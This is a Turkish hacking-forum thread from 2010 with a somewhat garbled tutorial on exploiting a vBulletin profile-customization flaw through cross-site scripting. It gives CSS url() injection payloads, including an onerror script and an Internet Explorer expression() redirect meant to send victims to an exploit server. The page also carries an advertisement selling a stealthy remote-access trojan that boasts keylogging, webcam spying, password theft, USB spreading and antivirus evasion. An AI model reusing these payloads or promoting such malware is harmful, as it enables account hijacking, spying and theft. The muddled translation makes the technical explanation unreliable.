vBulletin – A Journey Into 0day Exploitation (0days Kıymetlendirme "Resimli Anlatım")

vBulletin – A Journey Into 0day Exploitation Anlatım (Megabros) Forum ve İnternet kullanıcıları arasında önemli bir yeri olan ve Popüleritesini daima üst düzeyde tutan Vbulletin saldırı,karşılama dengesi üzerinde ele alındığında Konu AizHen tarafından açılmış, 799 kişi tarafından görüntülenip, 1 yanıt almış.

Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!


Karşı sistemi kendi makineniniz gibi kullandıran uzaktan yönetim programı.
  • Canlı ekran izleme,vnc ve mouse kontrolü
  • Antiviruslerce %100 tanınmaz, güncelleme garantili
  • Ortam sesi dinleme
  • Webcam izleme
  • Online/offline keylogger
  • Kopyala/Yapıştır, Clipboard Yöneticisi (Canlı)
  • Warlogger desteği
  • Çalıştırma,upload,download,yeniden adlandırma,silme,gizli çalıştırma,thumbnail görüntüleme(indirmeden dosya görme)
  • Registry yöneticisi (tam özellikli)
  • Msn şifrelerini ve geçmişteki tüm adresleri çıkartma
  • Firefox şifrelerini çözme
  • Görev yöneticisi, görev sonlandırma
  • Çalışan programları listeleme
  • Bağlı sistemlerin yaptığı işlemleri tek listede görme!
  • Binder / dosya birleştirici
  • Virus tipinde resource kullanmadan bindleme özelliği
  • Mp3,resim,jpeg,vs her türlü dosya ile birleşip,exploitler ile link üzerinden,htmlden yayılır
  • Keyloggerda dll kullanmadan system hooklarıyla loglama ve tabii dll kullanmadan kimse yapamıyorken %100 sisteme zarar vermeden stabil bütün dünya dillerinde loglama.
  • Internet Explorer 9 şifre çözme
  • Chrome Şifreleri (bütün sürümler)
  • Firefox Şifreleri (bütün sürümler)
  • Internet Exporer Şifreleri (bütün sürümler)
  • Safari Şifreleri (bütün sürümler)
  • Reklam Bot ile site reklamı, dosya yükletme, bulaştırma,vs. MSN,Yahoo Messenger,ICQ ve AIM sistemlerinin hepsini tanır. Reklam bot aynı anda birden fazla sisteme komut verebilir.
  • Browserda geçmiş verileri, form girdilerini kayıt edip trojandan erişme
  • Klavye Kilitleme
  • Mouse Kilitleme
  • Masaüstü Gizleme
  • Sistemlere takılı flash/usb disk varsa bulaştırma Birden fazla sisteme aynı anda autorun oluşturabilir.
  • Uzaktan exe yükletme Aynı anda birden fazla sisteme exeleri tek komutla yükletebilir.
  • Fake sistem kilitleme. Tek tıklama ile karşı sistemi restart/yeniden başlat moduna geçmiş gösterip kilitleme. Kullanıcı fişten çekmediği sürece siz istemedikçe bilgisayarı kapatamaz, yeniden başlatamaz.
  • Karşı sistemin yeniden başlatılma talebinde masaustu ve bütün ekranı kapanıyor gibi gösterip kapanış sesini çalara kullanıcıyı bekletme. Kullanıcı sistemi kapatmak istediğinde siz izin vermezseniz windows kapanmaya çalışıyor gibi görünür ancak yonetim panelinden her türlü işlem yapılır.
  • Sistem servislerini yönetme
  • Outlook şifreleri çözme. (bütün outlook versiyonları outlook expressler dahil)
  • Otomatik güncelleme özelliği ile yakalanma durumunda kısa sürede otomatik güncelleme alma
Sadece 690 TL! Satın almak için iletişim formunu kullanabilirsiniz.


Ayrıca, iki farklı üst sürümü var:
Özel Trojan 990 TL: İstediğiniz isimle çalışıp, istediğiniz yere kopyalanır ve başlangıçta, msconfig'de, registry'de görünmez.
ÖZEL TROJAN 1490 TL: Görev yöneticisinde ve sistemin hiç bir yerinde görünmez.


Sürümler: 1200 TL: - Kimsenin bulamayacağı şekilde çalışır!> m3hm3t. 1750 TL: %100 gizlidir, RAM'de çalışır ve bentrojanim.exe olarak çalışsa dahi hiç bir yerde görünmez.

Wardom.Com.TR bir bilgisayar güvenliği sitesidir; hack konuları bilgisayar güvenliğinin ve bilgisinin uç noktaları olduğundan dolayı, kullanıcıları bu konularda bilgilendirmek ve güvenliklerini arttırmak için yazılmaktadır.

Geri Dön   Wardom.Com.TR > Bilgisayar Güvenliği > Exploiting
Üye Ol Sözlük Üye Listesi Arama Yeni Mesajlar Forumları Okundu İşaretle

Konu Başlıkları: 0day 0days 8211 anlatimquot journey kiymetlendirme quotresimli vbulletin
Üye Olmadan Yorum Yazmak İçin Tıklayın!
vBulletin – A Journey Into 0day Exploitation (0days Kıymetlendirme "Resimli Anlatım") konusundaki toplam yorum: 1, okunma sayısı: 799.
 
Eski 20-11-2010, 18:23   #1
AizHen
1st Class WarrioR
 
Kayıt Tarihi: Dec 2006
Üye numarası: #99578
Yer: İstanbul
Mesaj sayısı: 4,236
Karma etkisi: 2848 AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000AizHen seviye: 2000
Karma: 283847
Kullanıcıya MSN yolu ile mesaj gönder
vBulletin – A Journey Into 0day Exploitation (0days Kıymetlendirme "Resimli Anlatım")

vBulletin – A Journey Into 0day Exploitation



Anlatım (Megabros)





Forum ve İnternet kullanıcıları arasında önemli bir yeri olan ve Popüleritesini daima üst düzeyde tutan Vbulletin saldırı,karşılama dengesi üzerinde ele alındığında güçsüz olarak görülsede baktığımızda oldukça güvenli bir uygulama olarak bilinmektedir.Her sistemde olduğu gibi Vbulletin sisteminede yeni özellikler eklendiğinde "Profil Özelleştirme" dediğimiz veya diyebileceğimiz yeni sistem açıkları ortaya çıkabilir.








Arkadaşlar burada göreceğimiz gibi gerçek özelleştirme olanağını bir nebze olarakda yakalamak için renk kodlarını bu özelleştirme için kullanmak mümkün olabimektedir "# 000000, RGB kodlarını rgb (255, 255, 255)" hatta bu kodların normal görüntülerindende bu özelleştirmeler elde edilebilir yani kodlar dışındada bu işlem yapılabilmektedir.Herkesin kendi profillerini veya farklı Code'ler ile kendi profillerinin arka kısımlarını değiştirdiklerini bilmekteyiz bu yapacağımız yöntemide böyle düşünebiliriz.

Gördüğünüz gibi Url : ('yol / image.png için') izleyeceğimiz yöntem ve özelleştirme için aslında bu URL uygun fakat bu yöntemin uygulamalarında dahasının olduğunuda bilmek gerekiyor...







Sisteme sızmaya çalışan ve bu özellikleri kullanmak isteyen "Hacker" veya "Defacer" bu sistemi kırmak için Bulletin kullanımına yeni bir özellik eklemeye çalışacak ve bunu kırmaya çalışacaktır.Tabiki bunu yapmak için bir arama diziside kullanılabilir di göreceğimiz üzere 'HaXx "/ \> < arama dizesinin içeriği gerçek bakımdan bakıldığında bir işlevi olmadığı gözükse bile WEB server geçitlerini kırmak için yeterli bir katkı maddesi olarakda görülebilmektedir.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035






Arkadaşlar yukarıda göreceğimiz gibi Profil özelleştirme desteği ve özelliği (geçersiz) olarak adlandırılmış ve bunların dizeleri belirtilen sistemin içerisinde saklı değilse Sistem Özellikleri düzgün kodlanmamış ise değerleri kötü olarak gösterilebilir.



[/url]



Aklımızda kurduğumuz senaryoda "/" işaretine yani kesme olanağına dayalı olarak kullanılan Javascript uygulamaları içerisinde uygun kullanıcıların veya uygun olmayan kullanıcıların bu değişkenlikleri kullanılabilir hale getirmesinden dolayı eklemeler mümkün olacaktır ve bu eklemelerin yapılması gerekmektedir.Ancak önemli olan Tırnak işareti içerisinde HTML kodlamalarının ne olarak ve hangi işlevde kullanılmasında kullanmak önemlidir.Muhmetelen kullanılan HTML Scriptlerini "Hacker" dediğimiz illegal kullanıcı enjekte olarak kullanmak için bunu bir sağlayıcı olarak kullanabilmesini bilmektedir.Büyük olasılıkla "fonksiyon preg_match" etiketine uyumlu olan bazı sözcük bütünlükleri <script> kodu ile kötü huylu bir hacker kolaylıkla diğer bir etikete bu yolla enjekte edilebilir ama bu yol görüldüğü kadar kolay olmamakla beraber uzaktır.






Burada <script> kullanılmak nedenine geldiğinde Javascript çalıştırmak mümkün olmayabilir.Aslında baktığımızda XSS kullanan bir Defacer için bu büyük bir kozda olabilir.Örnek olarak resim etiketi olarak <img> fonksiyonunu kullanın.Bu durumda görüntü yüklenemez ve yüklemeyen görüntünün size vereceği hata "onerror" olarak gösterilebilmektedir.EventHandler ve EventHandler kısımlarınada Javasicript içeriklerini eklemekte mümkün olmaktadır tabiki.Hattağa Javascript'i engekte etmeden önce basit bir görüntü kullanmak istiyorsanız yani bu anlattığımız sistemin basitçe çalışıp çalışmadığını kontrol etmek istiyorsanız kendinize bir test ortamı yaratarak denemelerde yapabilirsiniz.


Kod:
url(</script><img src="" />)




Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035


Hedef sitenin kaynak kodu sistemin başında görülebileceği gibi bir görüntü yani "saldırı" ile sonradan eklenen kaynak biçimi (src) değişkeni ile beraber girişin doğru çalıştığınıda gözlemliyebiliriz.





JavaScript Kullanımı Hakkında Başarı Sağlama




Özelliklerimizi test ettikten sonra özel dizelerin kodlanmış şekillerininde kodlanması gerektiğini kolayca gösterebilen (iyi) yani en iyi çözüm Encoder ilede yapılabilmekderi "/ * * XSSOR /" bu sistem iş görebilir hızlı ve iyi bir verim olabilirsiniz.Giriş kısmının etkin olmasını istiyorsanız tırnak işareti ile sistemin başlangıcını açmanız gerekiyor.
Bu tür "Merhaba maxe" karakter code'larında kodlanmış son dizesi şu şekilde olabilir, örnek olarak :



Kod:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)




Şimdi sırada bu açığı biraz daha araştırdıktan sonra ilk güvenlik açığına bir Hacker'ın dadandığı ortaya çıktı.Bir forum yöneticisi için iyi ve kötü hacker için yapılmış bir sistem olabilir bu sistem.Uygulama geliştiricileri için CSS sayfalarına Javascript enjektesi yapılması mümkün değildir çünkü yapılan yöntemde yanlışlık olduğu bilinmektedir.Tespit edilen ilk güvenlik açığı tarama yapıldıktan sonra yapılan kötü niyetli bir profil için oluşturulmuş ise bypass yöntemleri ile devre dışı bırakılabilmektedir.Hedef kullanıcı için kullanılabilecek en iyi sistem İnternet Explorer 7 ile CSS sayfalarına java script enjekte etmekte mümkün olabilmektedir.Aslında İnternet Explorer 6 sürümüde bu iş için kullanılabilir fakat XSS yöntemi bu yöntem için en uygun sistem olacak gibi gözükmekte






Evet işte bir yönlendirme dizesi, Hacker tarafından kontrol edilebilen kötü niyetli bir kullanıcı profili içine enjekte edilebilir fiili saldırı dizesi şu şekilde olabilir :
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035


Kod:
url(/);width:expression(document.********="http://127.0.0.1:1234")


Buradaki bir yöntemde Locallhost yönlendirme yapmak gerekebilir.Yönlendirme yaparken Metasploit üzerinden Exploit hizmeti veren veya bu exploit hizmeti ile sistemi istismar etmeye çalışan bir hackerıda yönlendirmede kullanmak mümkündür.Yukarıdaki dize sadece buna bir örnek olarak verilebilir.






İnternet Explorer sisteminin eski sürümlerini çalıştıranların yapması gerekenler hacker tarafından kullanıcı profillerinin zarar görmesinden öteye gidebilmektedir.Buradaki yöntem sosyal müdendisliklede bağdaştırılabilir ve kullanıcı profilleri yapılan yöntem ile çözümlenebilir.












Ve İşte XSS ! Tarayıcının Exploit üzerinde olduğunu görebilirsiniz.Açığın ciddiyetini görebilirsiniz yani konuyu yakından incelediyseniz aslında zahmetsiz gelen bu açığın ciddiyetide görülebilmektedir.Bu yöntemde yani senaryoda diyelim hedef kullanıcılarının eski kullandıkları tarayıcılarda kullanımı oldukça yaygındır.Hackerın bu sistemi yani açığı uygulayabilmesi için kullanılan tarayıcının olmasa bile EXPLOİT'in 0day olması gerekmektedir.Tarayıcının sömürücü kitlelerinin yanı sıra hedef İE ve FF saldırı türlerinin bu tarayıcılar üzerinden açığa çıkmasına olanak sağlayabilmektedir.






Yayımlanan Exploitlerin bütünlüğü Exploit-DB,Bugtrag ve InterNOT ile açıklanabilir.Sistemin gereksinimlerine ulaşmak için bu sistemlerede göz atabilir ve gelişmelerden haberdar olabilirsiniz..


Saygılar...
AizHen Çevrimdışı   Alıntı Yaparak Cevapla

Görüntülediğiniz konu içerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanunun 8. Maddesine ve T.C.Knın 125. Maddesine göre yayınlanmakta olup içeriğinden yazarı sorumludur. Bu konu hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.
Eski 20-11-2010, 23:16   #2
hards
Çırak
 
Kayıt Tarihi: Oct 2010
Üye numarası: #489401
Mesaj sayısı: 12
Karma etkisi: 0 hards seviye: 10
Karma: 10

teşekkürler
hards Çevrimdışı   Alıntı Yaparak Cevapla

Üye Olmadan Yorum Yazmak İçin Tıklayın!
Konudaki toplam yorum: 1, okunma sayısı: 799.
Cevapla





Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)
 
Konu Araçları Bu Konuda Ara
Bu Konuda Ara:

Gelişmiş Arama

Bu Konuda Aradığınızı Bulamadıysanız Şunlara Bakmanızı Öneririz
Konu Konu Yazarı Forum Cevaplar Son Mesaj
Gorsel C#.net - Visual Studio.NET - ASP.NET Egitim Seti betho Asp.NET - C# - VB.net 38 05-04-2012 21:24
C#,ASP.Net görsel eğitim seti Mr. No Asp.NET - C# - VB.net 21 24-01-2011 12:47
Complete Do It Yourself (DIY) Tutorials – 159 eBooks TechniQue E-book 0 02-09-2009 05:39
**Delphi 7 Türkçe Görsel Eğitim Seti** xxx_x Programlar 1 20-04-2009 06:35
2008-2009 Sezonu Transfer Dosyasi José_Mourınho Beşiktaş, Trabzonspor ve Diğerleri... 5 08-07-2008 20:54

Gönderme Kuralları
You may not post new threads
You may post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smilies Açık
[IMG] Kodu Açık
HTML Kodu Kapalı

Forum Seç


Hacking ve Bilgisayar Güvenliği Öğrenmek İçin!

Forum saati Türkiye saatine göredir. GMT +3. Şuan saat: 23:19.
(Türkiye için GMT +2 seçilmelidir.)


Wardom.org



İçerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. Wardom hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.